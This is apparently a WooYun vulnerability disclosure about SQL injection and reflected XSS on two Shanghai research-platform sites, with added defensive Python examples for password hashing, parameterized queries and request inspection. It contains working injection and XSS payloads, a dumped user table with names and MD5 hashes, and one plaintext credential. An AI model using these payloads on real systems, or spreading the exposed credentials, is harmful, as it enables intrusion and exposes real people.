WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-09-15: Details reported to the vendor, awaiting the vendor's handling
2015-09-17: Vendor confirmed; details disclosed to the vendor only
2015-09-27: Details disclosed to core white hats and experts in the relevant field
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public

As in the title.

The Shanghai R&D Public Service Platform effectively integrates the science and technology resources of Shanghai and the Yangtze River Delta region; by opening up instruments, equipment and research bases, sharing scientific data and scientific literature, and providing professional technical services, public-welfare training, expert consulting and other services, it promotes science and technology res... It has been a while since I submitted a vulnerability; continuing the series.

1. SQL injection (unrestricted database dump): dumped usernames and passwords, but unexpectedly the page does not exist once authentication succeeds.
http://**.**.**.**/btin_cms/cnt/moreCount.do?browseParam.channelName=%E4%BA%A7%E4%B8%9A%E5%8A%A8%E6%80%81&browseParam.channelName=%E4%BA%A7%E4%B8%9A%E6%94%BF%E7%AD%96%E6%B3%95%E8%A7%84%E5%92%8C%E6%A0%87%E5%87%86&browseParam.templateName=BTIN_SUMMARY&browseParam.webSymbol=btin') AND (SELECT * FROM (SELECT(SLEEP(5)))UrFp) AND ('TwOE'='TwOE
Database: btin
Table: tb_cms_user
[18 columns]
+-------------------+---------------+
| Column            | Type          |
+-------------------+---------------+
| address           | varchar(500)  |
| availability_date | date          |
| check_articles    | int(10)       |
| created_date      | datetime      |
| creater           | int(10)       |
| description       | varchar(4000) |
| last_edit_time    | datetime      |
| last_login_time   | datetime      |
| login_count       | int(10)       |
| name              | varchar(50)   |
| organization      | varchar(500)  |
| password          | varchar(32)   |
| phone             | varchar(50)   |
| role              | varchar(20)   |
| status            | varchar(20)   |
| submit_articles   | int(10)       |
| true_name         | varchar(20)   |
| user_id           | int(10)       |
+-------------------+---------------+

Database: btin
Table: tb_cms_user
[15 entries]
+-------------+--------------------------+----------------------------------+-----------+---------+
| login_count | name                     | password                         | true_name | user_id |
+-------------+--------------------------+----------------------------------+-----------+---------+
| 3           | chen_jing100@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 陈静      | 32      |
| 8           | dqlv@**.**.**.**         | 96e79218965eb72c92a549dd5a330112 | yhju      | 33      |
| 626         | fhuang@**.**.**.**       | 96e79218965eb72c92a549dd5a330112 | 黄菲      | 27      |
| 1           | hwu01@**.**.**.**        | a8a3d0e05801ad8e60034365f5c3b6fd | 吴慧      | 19      |
| 2           | hywang1213@**.**.**.**   | 96e79218965eb72c92a549dd5a330112 | 王慧媛    | 15      |
| 51          | jgren@**.**.**.**        | 96e79218965eb72c92a549dd5a330112 | 任敬歌    | 23      |
| 160         | jiajia@**.**.**.**       | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 贾佳      | 9       |
| 16          | jszhang@**.**.**.**      | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 张建设    | 28      |
| 33          | lbgao@**.**.**.**        | 96e79218965eb72c92a549dd5a330112 | 高柳滨    | 26      |
| 232         | lifecenter@**.**.**.**   | 96e79218965eb72c92a549dd5a330112 | sdspb     | 1       |
| 148         | liuxiao@**.**.**.**      | 0f4237dd33c1e0d930180a402c5403d6 | 刘晓      | 14      |
| 63          | mhli@**.**.**.**         | 34018b24aaa7b894f2dee606c9edaf5f | 李明辉    | 18      |
| 85          | mhruan@**.**.**.**       | 4ddc1311251a0d11afa4696bec7829b3 | 阮梅花    | 13      |
| 4           | mrq@**.**.**.**          | fed86d76f8faeb4ff6e022315aa8251c | 毛汝倩    | 21      |
| 5           | xuerusp@**.**.**.**      | 96e79218965eb72c92a549dd5a330112 | 王冬冬    | 31      |
+-------------+--------------------------+----------------------------------+-----------+---------+
Tried logging in; after authentication succeeded the page did not exist (what is going on?!)  chen_jing100@**.**.**.**:111111

2. XSS
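The dumped table stores passwords in a varchar(32) column and the same value appears for eight of the fifteen users, the footprint of an unsalted fast hash. The following is an added example, not code from the report or the affected site: it audits a credential table for shared stored values (constructed rows modelled on the dump, with placeholder mail domains) and shows the salted, memory-hard scheme that should replace the column.

```python
# Added example (not code from the report or the affected site): audit a dumped
# credential table for an unsalted fast-hash scheme and show the salted KDF that
# should replace it. Rows are constructed from the report's table; the mail
# domains are placeholders.
import hashlib
import hmac
import os
from collections import defaultdict

# (name, stored password value): a constructed subset of the dumped tb_cms_user.
SAMPLE_ROWS = [
    ("chen_jing100@example.invalid", "96e79218965eb72c92a549dd5a330112"),
    ("dqlv@example.invalid",         "96e79218965eb72c92a549dd5a330112"),
    ("fhuang@example.invalid",       "96e79218965eb72c92a549dd5a330112"),
    ("hwu01@example.invalid",        "a8a3d0e05801ad8e60034365f5c3b6fd"),
    ("jiajia@example.invalid",       "b10cbb6c51ac9ec77c8dc9f0bccdd296"),
    ("jszhang@example.invalid",      "b10cbb6c51ac9ec77c8dc9f0bccdd296"),
]

HEX_DIGITS = set("0123456789abcdef")


def is_32_hex(value):
    """A varchar(32) of hex digits is the footprint of an unsalted MD5 column."""
    return len(value) == 32 and set(value.lower()) <= HEX_DIGITS


def shared_hash_groups(rows):
    """Return {stored_value: [names]} for values stored for more than one user.

    With a per-user salt, two users who chose the same password still get
    different stored values, so any group here means the scheme is unsalted
    and one recovered value opens every account in the group.
    """
    groups = defaultdict(list)
    for name, stored in rows:
        groups[stored].append(name)
    return {h: names for h, names in groups.items() if len(names) > 1}


# scrypt cost: 128 * N * r = 16 MiB per hash, inside hashlib's default memory cap.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def hash_password(password, salt=None):
    """Store as 'scrypt$<salt hex>$<key hex>' with a fresh 16-byte random salt."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return "scrypt$%s$%s" % (salt.hex(), key.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        algo, salt_hex, _key_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    recomputed = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(recomputed, stored)


if __name__ == "__main__":
    for stored, names in shared_hash_groups(SAMPLE_ROWS).items():
        print("%s (md5-shaped: %s) shared by %d users: %s"
              % (stored, is_32_hex(stored), len(names), ", ".join(names)))
    a, b = hash_password("S3cret-sample"), hash_password("S3cret-sample")
    print("same password, different stored values:", a != b)
    print("verify:", verify_password("S3cret-sample", a), verify_password("wrong", a))
```

Running the audit against a real table is a cheap first check after an incident like this: a column where the same stored value recurs cannot have been salted, and the migration is to re-hash each user with `hash_password` at their next successful login.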
http://**.**.**.**:80/trace/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/primer/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/hotdata/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/taxonomy/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/nucleotide/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>

1. SQL injection (sensitive information on 62 enterprises can be dumped)

The injectable parameter is industry: http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1&PageNo=2
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162716b71,0x61574876665276567442,0x716b787071)-- &PageNo=2
Let's see whether a lot of sensitive information can be obtained.

2. XSS (non-stored)
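The UNION payload above works because the listing page pastes the request parameters into its SQL text, and the six NULLs show the original query selects six columns. The following is an added example, not the PHP page's code: it rebuilds that query on an in-memory SQLite database with constructed rows, first by string concatenation and then with placeholders, and runs a probe of the same shape against both. The same placeholder form also removes the time-based blind injection in the first site, since SLEEP() in a bound value is just a string.

```python
# Added example (not the PHP page's code): the listing page's query rebuilt on
# SQLite with constructed rows, first by string concatenation (the shape the
# UNION payload in the report exploits), then parameterized.
import sqlite3


def setup_db():
    """In-memory database with constructed rows; nothing here is real data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE services (id INTEGER, industry TEXT, org_name TEXT,
                               contact TEXT, phone TEXT, detail TEXT);
        CREATE TABLE users (id INTEGER, login TEXT, pw_hash TEXT);
        INSERT INTO services VALUES (1, '新能源', 'Solar lab',  'Li',   '021-0000', 'public');
        INSERT INTO services VALUES (2, '信息技术', 'HPC center', 'Wang', '021-1111', 'public');
        INSERT INTO users VALUES (1, 'admin', 'deadbeef');
    """)
    return conn


COLUMNS = "id, industry, org_name, contact, phone, detail"   # six, like the payload


def list_services_vulnerable(conn, industry, org_name):
    """User input pasted into the SQL text: a quote in org_name ends the literal
    and the rest of the input is parsed as SQL."""
    sql = ("SELECT %s FROM services WHERE industry = '%s' AND org_name LIKE '%%%s%%'"
           % (COLUMNS, industry, org_name))
    return conn.execute(sql).fetchall()


def list_services_safe(conn, industry, org_name):
    """Same query with placeholders: the driver passes the values separately, so
    the input is only ever compared, never parsed."""
    sql = "SELECT %s FROM services WHERE industry = ? AND org_name LIKE ?" % COLUMNS
    return conn.execute(sql, (industry, "%" + org_name + "%")).fetchall()


# Constructed probe with the same shape as the report's org_name payload:
# close the literal, UNION six columns from another table, comment out the rest.
UNION_PROBE = "1' UNION ALL SELECT id, login, pw_hash, NULL, NULL, NULL FROM users-- "


if __name__ == "__main__":
    db = setup_db()
    print("concatenated:", list_services_vulnerable(db, "新能源", UNION_PROBE))
    print("parameterized:", list_services_safe(db, "新能源", UNION_PROBE))
    print("normal use:", list_services_safe(db, "新能源", "Solar"))
```

The concatenated version returns the users row alongside the listing; the parameterized version returns nothing for the probe and the same rows as before for ordinary input, which is the whole fix.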
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%25E4%25BF%25A1%25E6%2581%25AF%25E6%258A%2580%25E6%259C%25AF%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28/xss1/%29%3C/ScRiPt%3E&org_name=%E4%B8%8A%E6%B5%B7%E8%B6%85%E7%BA%A7%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%25E6%2596%25B0%25E8%2583%25BD%25E6%25BA%2590%27%22%28%29%26%25%3E%3CScRiPt%20%3Ealert%28/xss2/%29%3C/ScRiPt%3E&org_name=%E4%B8%8A%E6%B5%B7%E5%A4%AA%E9%98%B3%E8%83%BD%E5%B7%A5%E7%A8%8B%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6%E4%B8%AD%E5%BF%83%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%EF%BC%88%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%AA%E9%98%B3%E8%83%BD%E5%85%89%E4%BC%8F%E6%8A%80%E6%9C%AF%E5%88%9B%E6%96%B0%E6%9C%8D%E5%8A%A1%E5%B9%B3%E5%8F%B0%EF%BC%89&PageNo=2
Parameter filtering.

Severity: High
Vulnerability Rank: 12
Confirmed: 2015-09-17 15:33
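The report's one-line fix, parameter filtering, and the reflected XSS in the quickSearch.do and changxing_fwlb.php pages call for two separate pieces. The following is an added example, not code from either site: a request inspector that decodes parameters (including the double percent-encoding used in the second site's XSS URLs, where `%25` only becomes `%` on the first pass) and flags the probe shapes shown in this report, plus the output encoding that actually stops the echo of entrezWord from leaving its attribute. The host names, the signature set and the sample requests are constructed.

```python
# Added example (not the sites' code). Two defensive pieces behind the report's
# one-line fix, "parameter filtering": decode and inspect request parameters so
# the injection and XSS probes shown above are caught even when double-encoded,
# and encode the reflected value so the quickSearch.do echo cannot leave its
# attribute. Signatures, hosts and sample requests are constructed.
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit


def decode_param(raw, max_rounds=3):
    """Undo repeated percent-encoding. The second site's XSS URLs are encoded
    twice (%25 becomes % on the first pass), which a single decode misses."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


# Probe shapes visible in the report; a real deployment tunes these per application.
SIGNATURES = {
    "sqli-time": re.compile(r"\bsleep\s*\(", re.I),
    "sqli-union": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "xss-tag": re.compile(r"<\s*/?\s*script\b", re.I),
}


def inspect_request(url):
    """Return {param: [signature names]} for every decoded parameter that matches.

    Every occurrence of a repeated parameter is checked (the first URL in the
    report sends browseParam.channelName twice), not only the last one."""
    findings = {}
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = decode_param(raw)
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings


def render_search_box(entrez_word):
    """Context-correct output encoding for the reflected search term: escaping
    '<', '>', '&' and quotes keeps the value inside the attribute, which is the
    fix the filter above only approximates."""
    return '<input name="entrezWord" value="%s">' % html.escape(entrez_word, quote=True)


# Constructed requests modelled on the report's URLs (host is a placeholder).
SAMPLE_REQUESTS = [
    "http://host.invalid/btin_cms/cnt/moreCount.do?browseParam.channelName=a"
    "&browseParam.channelName=b&browseParam.webSymbol=btin') AND (SELECT * FROM "
    "(SELECT(SLEEP(5)))UrFp) AND ('TwOE'='TwOE",
    "http://host.invalid/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90"
    "&org_name=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- &PageNo=2",
    "http://host.invalid/web/changxing/changxing_fwlb.php?industry="
    "%25E6%2596%25B0%27%22%28%29%26%25%3E%3CScRiPt%20%3Ealert%28/xss2/%29%3C/ScRiPt%3E"
    "&org_name=x&PageNo=2",
    "http://host.invalid/trace/cn/quickSearch.do?entrezWord=BRCA1",
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(inspect_request(url) or "clean", "<-", url[:70])
    print(render_search_box('"><script>alert(/xss/);</sCript>'))
```

The inspector is a detection and logging aid, not the fix: signature lists are bypassable, so the parameterized query and the context-correct output encoding are what close the two bug classes, with the inspector left in place to surface probing in the logs.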
CNVD confirmed and reproduced the described situation; it has been handed over to CNCERT to be forwarded to the Shanghai branch center, which will coordinate handling with the website's operating unit. Rank 12 based on multiple risk scores.

None yet.